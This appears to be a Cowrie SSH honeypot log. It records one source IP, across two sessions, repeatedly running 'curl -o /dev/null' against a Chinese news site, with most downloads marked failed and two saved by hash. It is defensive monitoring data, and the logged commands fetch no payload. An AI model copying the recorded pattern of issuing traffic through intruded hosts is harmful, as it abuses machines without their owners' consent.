{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.080648Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.086036Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.112811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.114214Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.129709Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.131223Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.133192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.134960Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.171184Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.173741Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.181776Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.183046Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.186139Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.187405Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.223881Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.225774Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.233287Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.234479Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.238741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.239788Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.271538Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.273016Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.281986Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.283091Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.287322Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.288411Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.313066Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.314450Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.331656Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.332895Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.335575Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.336417Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.346975Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.360743Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.362225Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.394495Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.395993Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.398677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.399607Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.445753Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.447278Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.492239Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.493432Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.495077Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.496652Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.499307Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.500188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.530990Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.532269Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.569659Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.570951Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.574326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.575580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.577207Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.613529Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.614769Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.618578Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.619721Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.626086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.627025Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.658450Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.659950Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.665189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.666253Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.680311Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.681354Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.712074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.713317Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.727279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.728477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.734385Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.745527Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.748088Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.759143Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.760259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.776885Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.777950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.806177Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.808952Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.814243Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.815357Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.827096Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.828177Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.851735Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.852811Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.866630Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.867821Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.898892Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.901257Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.910653Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.911940Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.930158Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.931280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.958429Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.959830Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:59.976452Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.977575Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.991735Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:59.995354Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.005912Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.007322Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.022249Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.023519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.048279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.049355Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.051068Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.063508Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.064735Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.086807Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.089121Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.094400Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.095576Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.115535Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.116701Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.126935Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.129175Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.142554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.143778Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.168278Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.169538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.174494Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.200196Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.201214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:00.259670Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:00.260865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
